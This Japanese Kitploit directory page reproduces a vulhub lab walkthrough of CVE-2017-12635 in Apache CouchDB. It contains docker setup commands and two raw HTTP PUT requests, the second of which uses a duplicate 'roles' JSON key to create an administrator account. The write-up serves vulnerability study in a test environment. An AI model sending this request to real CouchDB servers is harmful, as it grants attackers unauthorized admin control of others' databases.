Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Apache-couchdb-CVE-2017-12635 | Kitploit
ツール/GitHubGitHub/cyberharsh/apache-couchdb-cve-2017-12635
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストラボと実践
GitHubcyberharsh/apache-couchdb-cve-2017-12635

Apache-couchdb-CVE-2017-12635

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
116年前未レビュー

Couchdb 垂直権限バイパス脆弱性(CVE-2017-12635)

Apache CouchDBは、使いやすさと「Webを完全に取り込むデータベース」であることに重点を置いたオープンソースデータベースです。JSONをストレージ形式として、JavaScriptをクエリ言語として、MapReduceとHTTPをAPIとして使用するNoSQLデータベースです。応用範囲は広く、例えばBBCは動的コンテンツ表示プラットフォームで、Credit Suisseは社内の商品部門の市場フレームワークで、Meeboはソーシャルプラットフォーム(Webおよびアプリケーション)で使用しています。

2017年11月15日にCVE-2017-12635とCVE-2017-12636が公開されました。CVE-2017-12635は、ErlangとJavaScriptのJSON解析方法の違いにより、ステートメント実行に差異が生じることが原因です。この脆弱性により、任意のユーザーが管理者を作成できるため、垂直権限バイパス脆弱性に分類されます。

影響を受けるバージョン:1.7.0未満および2.1.1未満

参考リンク:

  • http://bobao.360.cn/learning/detail/4716.html
  • https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

テスト環境

環境のビルドおよび起動:

root@kitploit:~
docker-compose build
docker-compose up -d

環境起動後、http://your-ip:5984/_utils/にアクセスするとWebページが表示され、CouchDBが正常に起動したことが確認できます。ただし、パスワードが不明なためログインできません。

脆弱性の再現

まず、以下のデータパケットを送信します:

root@kitploit:~
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

ご覧のとおり、403エラー{"error":"forbidden","reason":"Only _admin may set roles"}が返されます。Roleロールを設定できるのは管理者のみです:

2つのrolesを含むデータパケットを送信すると、制限をバイパスできます:

root@kitploit:~
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

管理者の作成に成功します。アカウント名とパスワードはどちらもvulhubです:

再度http://your-ip:5984/_utils/にアクセスし、アカウント名とパスワードvulhubを入力すると、正常にログインできます:

ツールをダウンロード